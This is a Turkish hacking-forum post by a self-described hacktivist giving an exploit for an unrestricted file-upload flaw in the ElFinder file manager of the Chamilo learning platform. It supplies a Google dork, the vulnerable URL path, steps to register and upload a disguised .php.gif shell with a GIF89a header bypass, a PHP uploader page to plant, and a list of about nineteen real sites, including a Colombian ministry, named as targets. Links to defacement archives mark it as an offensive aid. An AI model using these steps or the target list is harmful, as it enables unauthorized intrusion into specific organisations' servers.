Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Chamilo © 2020 Campus v1 ElFinder Shell Upload Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,389 / 1,389
Deneyim: 59 / 100
Rep Sayısı: 2870
Mesaj Sayısı: 6555
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Chamilo © 2020 Campus v1 ElFinder Shell Upload Vuln
27.05.2020 05:56
####################################################################

# Exploit Title : Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27 May 2020
# Vendor Homepage : campus.chamilo.org
# Software Version : 1 and 1.x.x etc...
# Software Download Link : chamilo.org/en/download/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Powered by Chamilo © 2020 site:com
# Vulnerability Type :
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 Permissions, Privileges, and Access Controls
CAPEC-650 [ Upload a Web Shell to a Web Server ]
CAPEC-17 [ Using Malicious Files ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities

####################################################################

# Impact :
***********
This Software is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.

CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
*********************************************************
The software allows the attacker to upload or transfer files of dangerous types that
can be automatically processed within the product's environment.

CWE-264 Permissions, Privileges, and Access Controls
****************************************************
Weaknesses in this category are related to the management of
permissions, privileges, and other security features that are used
to perform access control.

CAPEC-650 [ Upload a Web Shell to a Web Server ]
*********************************************************
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in
such a way that it can be executed remotely. This shell can have various capabilities, thereby acting
as a "gateway" to the underlying web server. The shell might execute at the higher permission level
of the web server, providing the ability the execute malicious code at elevated levels.

CAPEC-17 [ Using Malicious Files ]
*******************************
An attack of this type exploits a system's configuration that allows an attacker to either directly
access an executable file, for example through shell access; or in a possible worst case allows
an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented
middleware systems which have many integration points are particularly vulnerable, because
both the programmers and the administrators must be in synch regarding the interfaces
and the correct privileges for each interface.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

Important Note : Ministry of Commerce Industry and Tourism Colombia [ mincit.gov.co ] is vulnerable.

If says to you :

Unable to connect to backend.
Invalid backend configuration.
Readable volumes not available.

Then Register yourself with Admin or Author Account.

/main/auth/inscription.php

Then you can use File Upload and Shell the sites with .php.gif or php.pjpg

Use your Brain Smile

Vulnerability ScreenShot Proof =>

https://www.upload.ee/image/11775401/min...r27520.png

https://www.upload.ee/image/11775402/elf...052020.png

Upload your shell in gif format and then rename the format

# if the rename function was disabled and add this GIF89;aGIF89;aGIF89;a before <?PHP
# Example

GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }

else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
}
}
?>
</body>
</html>

Directory File Path :
**********************
/app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html

[PATH]/my_files/[YOURFILENAME].html

####################################################################

# Example Vulnerable Sites :
************************
[+] campus.chamilo.org/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] universidadsorjuanaines.edu.mx/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] bimwerxacademy.com/lms//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] mapsnetwork.eu/elearning/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] vle.minerva.bg/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] chamilo.etf.edu/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] petrogasplus.com/chamilo//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] cloud.octagonafrica.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] dsitello.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] stocksniperacademy.com/lms/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] margaridaschool.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] loreelorza.com/Academia/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] aulavirtual.unitylanguageschool.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] lms.mincit.gov.co/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] admejoresseguridadsig.com/aulas/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] chamilo-miage-toulouse.northeurope.cloudapp.azure.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] froggyspeak.net/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] campus.adesa-asesoria.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] saint-cricq.com/TSTC/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi